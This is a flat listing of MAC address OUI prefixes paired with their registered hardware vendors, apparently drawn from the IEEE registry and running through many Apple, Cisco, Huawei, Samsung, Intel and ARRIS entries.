A2B Electronics AB 404AD4 Widex A/S A09169 LG Electronics (Mobile Communications) 286C07 XIAOMI Electronics,CO.,LTD F0421C Intel Corporate CC79CF SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. 001925 Intelicis Corporation 9476B7 Samsung Electronics Co.,Ltd 9893CC LG ELECTRONICS INC 3CCD93 LG ELECTRONICS INC 2021A5 LG Electronics (Mobile Communications) 6CD68A LG Electronics (Mobile Communications) 002483 LG Electronics (Mobile Communications) 001FE3 LG Electronics (Mobile Communications) 2CD141 IEEE Registration Authority 3C39E7 IEEE Registration Authority BC6641 IEEE Registration Authority 80E4DA IEEE Registration Authority 885D90 IEEE Registration Authority C88ED1 IEEE Registration Authority B01F81 IEEE Registration Authority B8D812 IEEE Registration Authority 2C54CF LG Electronics (Mobile Communications) 485929 LG Electronics (Mobile Communications) 58A2B5 LG Electronics (Mobile Communications) 10F96F LG Electronics (Mobile Communications) C4438F LG Electronics (Mobile Communications) 000F62 Alcatel Bell Space N.V. C8755B Quantify Technology Pty. Ltd. 001CD8 BlueAnt Wireless 283638 IEEE Registration Authority F485C6 FDT Technologies 0019AB Raycom CO ., LTD 4C6641 SAMSUNG ELECTRO-MECHANICS(THAILAND) 5CA86A HUAWEI TECHNOLOGIES CO.,LTD 001428 Vocollect Inc 006B9E Vizio, Inc 70F395 Universal Global Scientific Industrial Co., Ltd. 1C21D1 IEEE Registration Authority 7C70BC IEEE Registration Authority E81863 IEEE Registration Authority 4C334E HIGHTECH 88124E Qualcomm Inc. 001B32 QLogic Corporation 0017CA Qisda Corporation 0015B7 Toshiba E89D87 Toshiba BCC00F Fiberhome Telecommunication Technologies Co.,LTD 9CA5C0 vivo Mobile Communication Co., Ltd. 3044A1 Shanghai Nanchao Information Technology E09579 ORTHOsoft inc, d/b/a Zimmer CAS A0ADA1 JMR Electronics, Inc E0ACF1 Cisco Systems, Inc 00015B ITALTEL S.p.A/RF-UP-I 00A0A8 RENEX CORPORATION F85A00 Sanford LP B40418 Smartchip Integrated Inc. 90CF7D Qingdao Hisense Communications Co.,Ltd. 0023F8 Zyxel Communications Corporation 0019CB Zyxel Communications Corporation 2C094D Raptor Engineering, LLC AC3743 HTC Corporation F40A4A INDUSNET Communication Technology Co.,LTD 10BD55 Q-Lab Corporation 00C0AB Telco Systems, Inc. 90A4DE Wistron Neweb Corporation 70E284 Wistron Infocomm (Zhongshan) Corporation A854B2 Wistron Neweb Corporation C449BB MITSUMI ELECTRIC CO.,LTD. FC2D5E zte corporation 001D7E Cisco-Linksys, LLC E4FB8F MOBIWIRE MOBILES (NINGBO) CO.,LTD 3876CA Shenzhen Smart Intelligent Technology Co.Ltd 8C897A AUGTEK 6038E0 Belkin International Inc. 8CD2E9 YOKOTE SEIKO CO., LTD. 50AB3E Qibixx AG B8BBAF Samsung Electronics Co.,Ltd 60C5AD Samsung Electronics Co.,Ltd 442C05 AMPAK Technology, Inc. 8850DD Infiniband Trade Association 002550 Riverbed Technology, Inc. FC55DC Baltic Latvian Universal Electronics LLC 941882 Hewlett Packard Enterprise 042758 HUAWEI TECHNOLOGIES CO.,LTD 9CE374 HUAWEI TECHNOLOGIES CO.,LTD DC3752 GE 002552 VXi Corporation B4D5BD Intel Corporate 98AA3C Will i-tech Co., Ltd. 0060B0 Hewlett Packard 00C0F0 Kingston Technology Company, Inc. F4911E ZHUHAI EWPE INFORMATION TECHNOLOGY INC DCD916 HUAWEI TECHNOLOGIES CO.,LTD 00022E TEAC Corp. R& D 608D17 Sentrus Government Systems Division, Inc 002382 Lih Rong electronic Enterprise Co., Ltd. F80F84 Natural Security SAS 44A42D TCT mobile ltd 7C738B Cocoon Alarm Ltd F845AD Konka Group Co., Ltd. 000FE2 Hangzhou H3C Technologies Co., Limited 80F62E Hangzhou H3C Technologies Co., Limited 70F96D Hangzhou H3C Technologies Co., Limited 6CE983 Gastron Co., LTD. 28E31F Xiaomi Communications Co Ltd 24F094 Apple, Inc. 086D41 Apple, Inc. ECADB8 Apple, Inc. 9801A7 Apple, Inc. 6879ED SHARP Corporation 9C741A HUAWEI TECHNOLOGIES CO.,LTD E4A8B6 HUAWEI TECHNOLOGIES CO.,LTD 244C07 HUAWEI TECHNOLOGIES CO.,LTD 746FF7 Wistron Neweb Corporation 0040AA Valmet Automation 083FBC zte corporation BC6A44 Commend International GmbH F0EE58 PACE Telematics GmbH 4CA003 VITEC 0018D7 JAVAD GNSS, Inc. 001F09 Jastec AC620D Jabil Circuit(Wuxi) Co.,Ltd 08000D International Computers, Ltd D0B0CD Moen 1C7370 Neotech 30E37A Intel Corporate 200A5E Xiangshan Giant Eagle Technology Developing Co., Ltd. 0000C9 Emulex Corporation B8AEED Elitegroup Computer Systems Co.,Ltd. 001F1F Edimax Technology Co. Ltd. 00020E ECI Telecom Ltd. 00C164 Cisco Systems, Inc CCB11A Samsung Electronics Co.,Ltd 703C03 RadiAnt Co.,Ltd 40476A Astro Gaming 7050AF SKY UK LIMITED F4EF9E SGSG SCIENCE & TECHNOLOGY CO. LTD 1C740D Zyxel Communications Corporation 603ECA Cambridge Medical Robotics Ltd AC44F2 YAMAHA CORPORATION CCD3E2 Jiangsu Yinhe Electronics Co.,Ltd. E4FAED Samsung Electronics Co.,Ltd 288335 Samsung Electronics Co.,Ltd DCCF96 Samsung Electronics Co.,Ltd 000DB0 Olym-tech Co.,Ltd. 30F6B9 Ecocentric Energy D4612E HUAWEI TECHNOLOGIES CO.,LTD 54511B HUAWEI TECHNOLOGIES CO.,LTD 68536C SPnS Co.,Ltd 1CEA1B Nokia B0E2E5 Fiberhome Telecommunication Technologies Co.,LTD 001FA7 Sony Interactive Entertainment Inc. 9046A2 Tedipay UK Ltd 6479A7 Phison Electronics Corp. 1C5F2B D-Link International DC2DCB Beijing Unis HengYue Technology Co., Ltd. CCB3AB shenzhen Biocare Bio-Medical Equipment Co.,Ltd. E4B318 Intel Corporate E0CDFD Beijing E3Control Technology Co, LTD 60ACC8 KunTeng Inc. C88722 Lumenpulse 84683E Intel Corporate F03404 TCT mobile ltd 80D160 Integrated Device Technology (Malaysia) Sdn. Bhd. 047E4A moobox CO., Ltd. 0080E5 NetApp 9C5C8E ASUSTek COMPUTER INC. 2C9662 Invenit BV 1C98EC Hewlett Packard Enterprise 70661B Sonova AG B07FB9 NETGEAR 30785C Partow Tamas Novin (Parman) 743E2B Ruckus Wireless E0C767 Apple, Inc. 80ED2C Apple, Inc. D8F710 Libre Wireless Technologies Inc. 3C591E TCL King Electrical Appliances (Huizhou) Co., Ltd 002682 Gemtek Technology Co., Ltd. 0009E1 Gemtek Technology Co., Ltd. 8CA2FD Starry, Inc. 84BA3B CANON INC. A87E33 Nokia Danmark A/S 002403 Nokia Danmark A/S 00BD3A Nokia Corporation 80501B Nokia Corporation A04E04 Nokia Corporation 14C126 Nokia Corporation 600194 Espressif Inc. AC61EA Apple, Inc. 38B54D Apple, Inc. 1C5CF2 Apple, Inc. 140C76 FREEBOX SAS D04D2C Roku, Inc. B0A737 Roku, Inc. 002404 Nokia Danmark A/S 0019B7 Nokia Danmark A/S 0017B0 Nokia Danmark A/S 0015DE Nokia Danmark A/S 0002EE Nokia Danmark A/S 001262 Nokia Danmark A/S 0014A7 Nokia Danmark A/S 0015A0 Nokia Danmark A/S 0016BC Nokia Danmark A/S 00174B Nokia Danmark A/S 002669 Nokia Danmark A/S 002109 Nokia Danmark A/S 002108 Nokia Danmark A/S 001B33 Nokia Danmark A/S 00194F Nokia Danmark A/S DC446D Allwinner Technology Co., Ltd 745AAA HUAWEI TECHNOLOGIES CO.,LTD 04FE8D HUAWEI TECHNOLOGIES CO.,LTD C43655 Shenzhen Fenglian Technology Co., Ltd. E0B9E5 Technicolor Delivery Technologies Belgium NV 0270B3 DATA RECALL LTD. 000136 CyberTAN Technology Inc. A4C7DE Cambridge Industries(Group) Co.,Ltd. 0019C7 Cambridge Industries(Group) Co.,Ltd. 70D931 Cambridge Industries(Group) Co.,Ltd. 0060BB Cabletron Systems, Inc. D8B8F6 Nantworks 008077 Brother industries, LTD. 001BE9 Broadcom 24F5AA Samsung Electronics Co.,Ltd 988389 Samsung Electronics Co.,Ltd 84A466 Samsung Electronics Co.,Ltd C4576E Samsung Electronics Co.,Ltd 508569 Samsung Electronics Co.,Ltd 029D8E CARDIAC RECORDERS, INC. 00402A Canoga Perkins Corporation 0030DA Comtrend Corporation 64680C Comtrend Corporation 3872C0 Comtrend Corporation A80600 Samsung Electronics Co.,Ltd F05A09 Samsung Electronics Co.,Ltd 94B10A Samsung Electronics Co.,Ltd 3CBBFD Samsung Electronics Co.,Ltd A48431 Samsung Electronics Co.,Ltd A0B4A5 Samsung Electronics Co.,Ltd E4F8EF Samsung Electronics Co.,Ltd 503275 Samsung Electronics Co.,Ltd 08FC88 Samsung Electronics Co.,Ltd F8D0BD Samsung Electronics Co.,Ltd 78595E Samsung Electronics Co.,Ltd 0C1420 Samsung Electronics Co.,Ltd A8D3F7 Arcadyan Technology Corporation 489D24 BlackBerry RTS 000D92 ARIMA Communications Corp. 002163 ASKEY COMPUTER CORP DC64B8 Shenzhen JingHanDa Electronics Co.Ltd 44EE02 MTI Ltd. 5856E8 ARRIS Group, Inc. F80BBE ARRIS Group, Inc. DC4517 ARRIS Group, Inc. C8AA21 ARRIS Group, Inc. 001333 BaudTec Corporation 58671A Barnes&Noble 002675 Aztech Electronics Pte Ltd 0024FE AVM GmbH C02506 AVM GmbH 405D82 NETGEAR F87B7A ARRIS Group, Inc. 002642 ARRIS Group, Inc. 0024A1 ARRIS Group, Inc. 002210 ARRIS Group, Inc. 0022B4 ARRIS Group, Inc. 00152F ARRIS Group, Inc. 0017EE ARRIS Group, Inc. 00111A ARRIS Group, Inc. 000F9F ARRIS Group, Inc. 0004BD ARRIS Group, Inc. 00149A ARRIS Group, Inc. 0014E8 ARRIS Group, Inc. 0019C0 ARRIS Group, Inc. 707E43 ARRIS Group, Inc. 002395 ARRIS Group, Inc. 0023AF ARRIS Group, Inc. 001FC4 ARRIS Group, Inc. 001CFB ARRIS Group, Inc. DCEF09 NETGEAR 08BD43 NETGEAR 4C60DE NETGEAR C43DC7 NETGEAR 74C246 Amazon Technologies Inc. 000FA3 Alpha Networks Inc. 001D6A Alpha Networks Inc. 0000F4 Allied Telesis, Inc. 001577 Allied Telesis, Inc. 703C39 SEAWING Kft 9097D5 Espressif Inc. ACD074 Espressif Inc. 38E3C5 Taicang T&W Electronics 5CE2F4 AcSiP Technology Corp. B8616F Accton Technology Corp 0012CF Accton Technology Corp 0030F1 Accton Technology Corp 98743D Shenzhen Jun Kai Hengye Technology Co. Ltd A0F459 FN-LINK TECHNOLOGY LIMITED 8841FC AirTies Wireless Networks 0030D3 Agilent Technologies, Inc. 00A02F ADB Broadband Italia 40F02F Liteon Technology Corporation 205476 Sony Corporation 709E29 Sony Interactive Entertainment Inc. A4DB30 Liteon Technology Corporation 00E06F ARRIS Group, Inc. 8096B1 ARRIS Group, Inc. 0015CE ARRIS Group, Inc. 0015A2 ARRIS Group, Inc. 0015A3 ARRIS Group, Inc. 0015A4 ARRIS Group, Inc. 0000CA ARRIS Group, Inc. 001FE4 Sony Corporation 002345 Sony Corporation 6C0E0D Sony Corporation 6C23B9 Sony Corporation 3017C8 Sony Corporation D4D184 ADB Broadband Italia A04FD4 ADB Broadband Italia 8CB864 AcSiP Technology Corp. 001A80 Sony Corporation 0012EE Sony Corporation 001620 Sony Corporation 001963 Sony Corporation 40E230 AzureWave Technology Inc. 80D21D AzureWave Technology Inc. 705A0F Hewlett Packard 4495FA Qingdao Santong Digital Technology Co.Ltd 586356 FN-LINK TECHNOLOGY LIMITED 0025D3 AzureWave Technology Inc. 1C4BD6 AzureWave Technology Inc. 08A95A AzureWave Technology Inc. 94DBC9 AzureWave Technology Inc. 240A64 AzureWave Technology Inc. D00ED9 Taicang T&W Electronics 541473 Wingtech Group (HongKong)Limited E09467 Intel Corporate 08D40C Intel Corporate 6C8814 Intel Corporate 303A64 Intel Corporate ACFDCE Intel Corporate 0CCC26 Airenetworks 0026C7 Intel Corporate 0026C6 Intel Corporate 88532E Intel Corporate E09D31 Intel Corporate 8086F2 Intel Corporate 90E2BA Intel Corporate 74C99A Ericsson AB 5CC213 Fr. Sauter AG 28101B MagnaCom 001495 2Wire Inc C46699 vivo Mobile Communication Co., Ltd. C8F230 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 8C0EE3 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD B07994 Motorola Mobility LLC, a Lenovo Company A470D6 Motorola Mobility LLC, a Lenovo Company 74E14A IEEE Registration Authority 0CEFAF IEEE Registration Authority F80278 IEEE Registration Authority A0BB3E IEEE Registration Authority 0022A4 2Wire Inc 982CBE 2Wire Inc 640F28 2Wire Inc 884AEA Texas Instruments 001556 Sagemcom Broadband SAS C0D044 Sagemcom Broadband SAS A01B29 Sagemcom Broadband SAS 7CCCB8 Intel Corporate F40669 Intel Corporate 001DE1 Intel Corporate 001F3B Intel Corporate 00215D Intel Corporate 00216A Intel Corporate 001676 Intel Corporate 0016EA Intel Corporate 001B77 Intel Corporate 001CC0 Intel Corporate 104A7D Intel Corporate C8CD72 Sagemcom Broadband SAS B499BA Hewlett Packard 0C47C9 Amazon Technologies Inc. 0050BA D-Link Corporation 00179A D-Link Corporation 001CF0 D-Link Corporation 001E58 D-Link Corporation 0022B0 D-Link Corporation 002401 D-Link Corporation 1CAFF7 D-Link International 14D64D D-Link International 9094E4 D-Link International CCB255 D-Link International 28107B D-Link International FC7516 D-Link International 84C9B2 D-Link International C8D3A3 D-Link International 0030C5 CADENCE DESIGN SYSTEMS, INC. 348AAE Sagemcom Broadband SAS 7C03D8 Sagemcom Broadband SAS C0AC54 Sagemcom Broadband SAS D494A1 Texas Instruments 944452 Belkin International Inc. F82C18 2Wire Inc 18017D Harbin Arteor technology co., LTD BC0DA5 Texas Instruments CC8CE3 Texas Instruments E0D7BA Texas Instruments D08CB5 Texas Instruments 00182F Texas Instruments 0017EA Texas Instruments 0021BA Texas Instruments 2C3996 Sagemcom Broadband SAS F08261 Sagemcom Broadband SAS 0014BF Cisco-Linksys, LLC B0B448 Texas Instruments 1CE2CC Texas Instruments 985945 Texas Instruments 409F87 Jide Technology (Hong Kong) Limited 0CF9C0 SKY UK LIMITED 94EB2C Google, Inc. 287CDB Hefei Toycloud Technology Co.,ltd 806AB0 Shenzhen TINNO Mobile Technology Corp. 48AD08 HUAWEI TECHNOLOGIES CO.,LTD 4CFB45 HUAWEI TECHNOLOGIES CO.,LTD 3CBB73 Shenzhen Xinguodu Technology Co., Ltd. 047863 Shanghai MXCHIP Information Technology Co., Ltd. 009ACD HUAWEI TECHNOLOGIES CO.,LTD 70B3D5 IEEE Registration Authority 28ED6A Apple, Inc. 0CC731 Currant, Inc. 3C5AB4 Google, Inc. F4F5E8 Google, Inc. 4CFF12 Fuze Entertainment Co., ltd AC9A22 NXP Semiconductors 000740 BUFFALO.INC 0024A5 BUFFALO.INC CCE1D5 BUFFALO.INC 2C4138 Hewlett Packard 441EA1 Hewlett Packard 78E7D1 Hewlett Packard 38F23E Microsoft Mobile Oy 0015D1 ARRIS Group, Inc. 001DD0 ARRIS Group, Inc. 001DD3 ARRIS Group, Inc. 0012F0 Intel Corporate E4F89C Intel Corporate 6CA100 Intel Corporate A402B9 Intel Corporate DC5360 Intel Corporate 8461A0 ARRIS Group, Inc. 5C8FE0 ARRIS Group, Inc. BCCAB5 ARRIS Group, Inc. D039B3 ARRIS Group, Inc. 000FCC ARRIS Group, Inc. 000CF1 Intel Corporation 784859 Hewlett Packard 3464A9 Hewlett Packard 3863BB Hewlett Packard 5CB901 Hewlett Packard DC4A3E Hewlett Packard 001CC4 Hewlett Packard 001E0B Hewlett Packard 002264 Hewlett Packard 0025B3 Hewlett Packard ACB313 ARRIS Group, Inc. 0CF893 ARRIS Group, Inc. 3CDFA9 ARRIS Group, Inc. 902155 HTC Corporation D8B377 HTC Corporation B0F1A3 Fengfan (BeiJing) Technology Co., Ltd. 7CB15D HUAWEI TECHNOLOGIES CO.,LTD 00265E Hon Hai Precision Ind. Co.,Ltd. 643150 Hewlett Packard 58DC6D Exceptional Innovation, Inc. A4D18C Apple, Inc. 241EEB Apple, Inc. CC25EF Apple, Inc. 942CB3 HUMAX Co., Ltd. 002719 TP-LINK TECHNOLOGIES CO.,LTD. 00242C Hon Hai Precision Ind. Co.,Ltd. ECB1D7 Hewlett Packard B05ADA Hewlett Packard 001083 Hewlett Packard 88CF98 HUAWEI TECHNOLOGIES CO.,LTD 140467 SNK Technologies Co.,Ltd. 40169F TP-LINK TECHNOLOGIES CO.,LTD. F4EC38 TP-LINK TECHNOLOGIES CO.,LTD. 90F652 TP-LINK TECHNOLOGIES CO.,LTD. 8030DC Texas Instruments A4D578 Texas Instruments 246081 razberi technologies 9CB654 Hewlett Packard 6C3BE5 Hewlett Packard A0B3CC Hewlett Packard 14CF92 TP-LINK TECHNOLOGIES CO.,LTD. 20DCE6 TP-LINK TECHNOLOGIES CO.,LTD. 14CC20 TP-LINK TECHNOLOGIES CO.,LTD. 808917 TP-LINK TECHNOLOGIES CO.,LTD. A09347 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD E8BBA8 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD B0AA36 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 784B87 Murata Manufacturing Co., Ltd. E4CE02 WyreStorm Technologies Ltd 40F308 Murata Manufacturing Co., Ltd. 84742A zte corporation 9CD24B zte corporation C87B5B zte corporation 0019C6 zte corporation 001DD9 Hon Hai Precision Ind. Co.,Ltd. 00197D Hon Hai Precision Ind. Co.,Ltd. 0007D8 Hitron Technologies. Inc C03E0F SKY UK LIMITED 7C4CA5 SKY UK LIMITED CC4E24 Brocade Communications Systems LLC 38F889 HUAWEI TECHNOLOGIES CO.,LTD D07AB5 HUAWEI TECHNOLOGIES CO.,LTD 904E2B HUAWEI TECHNOLOGIES CO.,LTD 2008ED HUAWEI TECHNOLOGIES CO.,LTD B43052 HUAWEI TECHNOLOGIES CO.,LTD 80D09B HUAWEI TECHNOLOGIES CO.,LTD 40CBA8 HUAWEI TECHNOLOGIES CO.,LTD D46E5C HUAWEI TECHNOLOGIES CO.,LTD 4C8BEF HUAWEI TECHNOLOGIES CO.,LTD 1C8E5C HUAWEI TECHNOLOGIES CO.,LTD B8BC1B HUAWEI TECHNOLOGIES CO.,LTD 582AF7 HUAWEI TECHNOLOGIES CO.,LTD 0034FE HUAWEI TECHNOLOGIES CO.,LTD C85195 HUAWEI TECHNOLOGIES CO.,LTD 0014A4 Hon Hai Precision Ind. Co.,Ltd. 78DD08 Hon Hai Precision Ind. Co.,Ltd. 9CD21E Hon Hai Precision Ind. Co.,Ltd. F80D43 Hon Hai Precision Ind. Co.,Ltd. 00E052 Brocade Communications Systems LLC 00010F Brocade Communications Systems LLC 080088 Brocade Communications Systems LLC 781DBA HUAWEI TECHNOLOGIES CO.,LTD 00259E HUAWEI TECHNOLOGIES CO.,LTD 3475C7 Avaya Inc B0ADAA Avaya Inc B4475E Avaya Inc BCADAB Avaya Inc 8853D4 HUAWEI TECHNOLOGIES CO.,LTD 04C06F HUAWEI TECHNOLOGIES CO.,LTD 202BC1 HUAWEI TECHNOLOGIES CO.,LTD 54A51B HUAWEI TECHNOLOGIES CO.,LTD 002568 HUAWEI TECHNOLOGIES CO.,LTD 006B8E Shanghai Feixun Communication Co.,Ltd. D46AA8 HUAWEI TECHNOLOGIES CO.,LTD FC48EF HUAWEI TECHNOLOGIES CO.,LTD 5006AB Cisco Systems, Inc 0003DD Comark Interactive Solutions 707BE8 HUAWEI TECHNOLOGIES CO.,LTD 4C1FCC HUAWEI TECHNOLOGIES CO.,LTD D4B110 HUAWEI TECHNOLOGIES CO.,LTD E468A3 HUAWEI TECHNOLOGIES CO.,LTD 3400A3 HUAWEI TECHNOLOGIES CO.,LTD 78A504 Texas Instruments 6CECEB Texas Instruments 247189 Texas Instruments 987BF3 Texas Instruments A0F6FD Texas Instruments D0B5C2 Texas Instruments 005053 Cisco Systems, Inc 005050 Cisco Systems, Inc 00906D Cisco Systems, Inc 0090AB Cisco Systems, Inc 005054 Cisco Systems, Inc FCA841 Avaya Inc 24D921 Avaya Inc 848371 Avaya Inc 001B4F Avaya Inc 00500B Cisco Systems, Inc 00902B Cisco Systems, Inc 3C0E23 Cisco Systems, Inc 00E018 ASUSTek COMPUTER INC. 000C6E ASUSTek COMPUTER INC. 000EA6 ASUSTek COMPUTER INC. 001D60 ASUSTek COMPUTER INC. 0015F2 ASUSTek COMPUTER INC. 00E0A3 Cisco Systems, Inc 00E08F Cisco Systems, Inc 001868 Cisco SPVTG 887556 Cisco Systems, Inc FC9947 Cisco Systems, Inc F44E05 Cisco Systems, Inc 881DFC Cisco Systems, Inc 1CE85D Cisco Systems, Inc A89D21 Cisco Systems, Inc 689CE2 Cisco Systems, Inc 6C2056 Cisco Systems, Inc ACF2C5 Cisco Systems, Inc 2401C7 Cisco Systems, Inc 6886A7 Cisco Systems, Inc 90E6BA ASUSTek COMPUTER INC. F46D04 ASUSTek COMPUTER INC. ECE1A9 Cisco Systems, Inc C067AF Cisco Systems, Inc C0255C Cisco Systems, Inc 08CC68 Cisco Systems, Inc 0C2724 Cisco Systems, Inc 6C416A Cisco Systems, Inc A0F849 Cisco Systems, Inc 6CFA89 Cisco Systems, Inc 001011 Cisco Systems, Inc 00000C Cisco Systems, Inc D8B190 Cisco Systems, Inc 3CD0F8 Apple, Inc. 680927 Apple, Inc. 6CC26B Apple, Inc. 44D884 Apple, Inc. 64200C Apple, Inc. 80E86F Cisco Systems, Inc AC7E8A Cisco Systems, Inc 046273 Cisco Systems, Inc 0023BE Cisco SPVTG 185933 Cisco SPVTG 445829 Cisco SPVTG 602AD0 Cisco SPVTG 745E1C PIONEER CORPORATION 1093E9 Apple, Inc. 442A60 Apple, Inc. C82A14 Apple, Inc. 3C0754 Apple, Inc. A4B197 Apple, Inc. A4D1D2 Apple, Inc. 001E52 Apple, Inc. 0021E9 Apple, Inc. 002608 Apple, Inc. 0026B0 Apple, Inc. 0026BB Apple, Inc. D49A20 Apple, Inc. 28CFE9 Apple, Inc. 00A040 Apple, Inc. 003065 Apple, Inc. 001451 Apple, Inc. F81EDF Apple, Inc. CC08E0 Apple, Inc. F0B479 Apple, Inc. 28CFDA Apple, Inc. 045453 Apple, Inc. 30F7C5 Apple, Inc. 40B395 Apple, Inc. 44FB42 Apple, Inc. E88D28 Apple, Inc. 949426 Apple, Inc. 207D74 Apple, Inc. F4F15A Apple, Inc. C86F1D Apple, Inc. F4F951 Apple, Inc. C06394 Apple, Inc. 18AF8F Apple, Inc. C8B5B7 Apple, Inc. 90B21F Apple, Inc. B8E856 Apple, Inc. D89695 Apple, Inc. 8C2DAA Apple, Inc. 848506 Apple, Inc. 98FE94 Apple, Inc. D8004D Apple, Inc. 542696 Apple, Inc. 64A3CB Apple, Inc. 68AE20 Apple, Inc. AC87A3 Apple, Inc. D8BB2C Apple, Inc. D04F7E Apple, Inc. 9CF387 Apple, Inc. A85B78 Apple, Inc. C8334B Apple, Inc. 64E682 Apple, Inc. 9C207B Apple, Inc. B065BD Apple, Inc. F0DBF8 Apple, Inc. 48746E Apple, Inc. 54AE27 Apple, Inc. 1499E2 Apple, Inc. B418D1 Apple, Inc. C8F650 Apple, Inc. A88E24 Apple, Inc. 3090AB Apple, Inc. D81D72 Apple, Inc. 341298 Apple, Inc. 70E72C Apple, Inc. 70ECE4 Apple, Inc. 50D59C Thai Habel Industrial Co., Ltd. 6C4A39 BITA 847D50 Holley Metering Limited FCE998 Apple, Inc. 0CBC9F Apple, Inc. 34363B Apple, Inc. D0A637 Apple, Inc. 789F70 Apple, Inc. 2078F0 Apple, Inc. E0ACCB Apple, Inc. A0999B Apple, Inc. 24240E Apple, Inc. 903C92 Apple, Inc. 3052CB Liteon Technology Corporation 049645 WUXI SKY CHIP INTERCONNECTION TECHNOLOGY CO.,LTD. 1CCDE5 Shanghai Wind Technologies Co.,Ltd 88C242 Poynt Co. 1402EC Hewlett Packard Enterprise AC1FD7 Real Vision Technology Co.,Ltd. E8DED6 Intrising Networks, Inc. DC82F6 iPort 68A828 HUAWEI TECHNOLOGIES CO.,LTD DCDC07 TRP Systems BV 3891D5 Hangzhou H3C Technologies Co., Limited 8CE2DA Circle Media Inc 489A42 Technomate Ltd E034E4 Feit Electric Company, Inc. 34C9F0 LM Technologies Ltd 681401 Hon Hai Precision Ind. Co.,Ltd. 50A9DE Smartcom - Bulgaria AD CC20E8 Apple, Inc. BC9C31 HUAWEI TECHNOLOGIES CO.,LTD 70480F Apple, Inc. 3CB72B PLUMgrid Inc D88B4C KingTing Tech. 48BF74 Baicells Technologies Co.,LTD 6C9354 Yaojin Technology (Shenzhen) Co., LTD. 20D160 Private 382187 Midea Group Co., Ltd. 78D6B2 Toshiba 381C23 Hilan Technology CO.,LTD 3029BE Shanghai MRDcom Co.,Ltd 649A12 P2 Mobile Technologies Limited E4C2D1 HUAWEI TECHNOLOGIES CO.,LTD F0B0E7 Apple, Inc. 0469F8 Apple, Inc. D4F4BE Palo Alto Networks AC8995 AzureWave Technology Inc. 48B620 ROLI Ltd. 20C3A4 RetailNext 384C90 ARRIS Group, Inc. D888CE RF Technology Pty Ltd 7CFE90 Mellanox Technologies, Inc. 60FD56 WOORISYSTEMS CO., Ltd 205531 Samsung Electronics Co.,Ltd 307CB2 ANOV FRANCE 847973 Shanghai Baud Data Communication Co.,Ltd. E8B4C8 Samsung Electronics Co.,Ltd D087E2 Samsung Electronics Co.,Ltd F05B7B Samsung Electronics Co.,Ltd B047BF Samsung Electronics Co.,Ltd 7C0BC6 Samsung Electronics Co.,Ltd 44FDA3 Everysight LTD. D47BB0 ASKEY COMPUTER CORP F0224E Esan electronic co. A8A795 Hon Hai Precision Ind. Co.,Ltd. 10868C ARRIS Group, Inc. 906FA9 NANJING PUTIAN TELECOMMUNICATIONS TECHNOLOGY CO.,LTD. 845B12 HUAWEI TECHNOLOGIES CO.,LTD C8F9C8 NewSharp Technology(SuZhou)Co,Ltd 68EDA4 Shenzhen Seavo Technology Co.,Ltd 2CC5D3 Ruckus Wireless 80C5E6 Microsoft Corporation 606DC7 Hon Hai Precision Ind. Co.,Ltd. 10DF8B Shenzhen CareDear Communication Technology Co.,Ltd CC5FBF Topwise 3G Communication Co., Ltd. E02CB2 Lenovo Mobile Communication (Wuhan) Company Limited 9870E8 INNATECH SDN BHD 44656A Mega Video Electronic(HK) Industry Co., Ltd 0C756C Anaren Microwave, Inc. 78EB39 Instituto Nacional de Tecnología Industrial 5440AD Samsung Electronics Co.,Ltd 145A83 Logi-D inc 54CD10 Panasonic Mobile Communications Co.,Ltd. A424DD Cambrionix Ltd D4F9A1 HUAWEI TECHNOLOGIES CO.,LTD D0C0BF Actions Microelectronics Co., Ltd FC8F90 Samsung Electronics Co.,Ltd FCE1FB Array Networks E89120 Motorola Mobility LLC, a Lenovo Company 48066A Tempered Networks, Inc. BCF811 Xiamen DNAKE Technology Co.,Ltd C412F5 D-Link International 804E81 Samsung Electronics Co.,Ltd 74042B Lenovo Mobile Communication (Wuhan) Company Limited D05C7A Sartura d.o.o. BC5C4C ELECOM CO.,LTD. 887033 Hangzhou Silan Microelectronic Inc DC56E6 Shenzhen Bococom Technology Co.,LTD E861BE Melec Inc. 5870C6 Shanghai Xiaoyi Technology Co., Ltd. C09A71 XIAMEN MEITU MOBILE TECHNOLOGY CO.LTD 64167F Polycom CC9635 LVS Co.,Ltd. 241C04 SHENZHEN JEHE TECHNOLOGY DEVELOPMENT CO., LTD. 4480EB Motorola Mobility LLC, a Lenovo Company F87AEF Rosonix Technology, Inc. 340B40 MIOS ELETTRONICA SRL 144146 Honeywell (China) Co., LTD 900A39 Wiio, Inc. 402814 RFI Engineering 4062B6 Tele system communication 60128B CANON INC. 84C3E8 Vaillant GmbH 2CAD13 SHENZHEN ZHILU TECHNOLOGY CO.,LTD C48E8F Hon Hai Precision Ind. Co.,Ltd. 54369B 1Verge Internet Technology (Beijing) Co., Ltd. 2028BC Visionscape Co,. Ltd. 40A5EF Shenzhen Four Seas Global Link Network Technology Co., Ltd. C4924C KEISOKUKI CENTER CO.,LTD. 749CE3 KodaCloud Canada, Inc D45556 Fiber Mountain Inc. 50502A Egardia 94F19E HUIZHOU MAORONG INTELLIGENT TECHNOLOGY CO.,LTD B856BD ITT LLC 78ACBF Igneous Systems 40D28A Nintendo Co., Ltd. 9CD35B Samsung Electronics Co.,Ltd A89FBA Samsung Electronics Co.,Ltd 749637 Todaair Electronic Co., Ltd 88E603 Avotek corporation DC60A1 Teledyne DALSA Professional Imaging 10A659 Mobile Create Co.,Ltd. 58856E QSC AG 4886E8 Microsoft Corporation 74A34A ZIMI CORPORATION 20C06D SHENZHEN SPACETEK TECHNOLOGY CO.,LTD 08A5C8 Sunnovo International Limited D05BA8 zte corporation E4BAD9 360 Fly Inc. 4CA515 Baikal Electronics JSC 7C3CB6 Shenzhen Homecare Technology Co.,Ltd. 1C7D22 FUJIFILM Business Innovation Corp. 6828F6 Vubiq Networks, Inc. B88EC6 Stateless Networks BCD165 Cisco SPVTG 28E476 Pi-Coral A86405 nimbus 9, Inc EC59E7 Microsoft Corporation C035C5 Prosoft Systems LTD A0A3E2 Actiontec Electronics, Inc 74547D Cisco SPVTG 50F43C Leeo Inc E887A3 Loxley Public Company Limited D8CB8A Micro-Star INTL CO., LTD. 08EB29 Jiangsu Huitong Group Co.,Ltd. F88479 Yaojin Technology(Shenzhen)Co.,Ltd 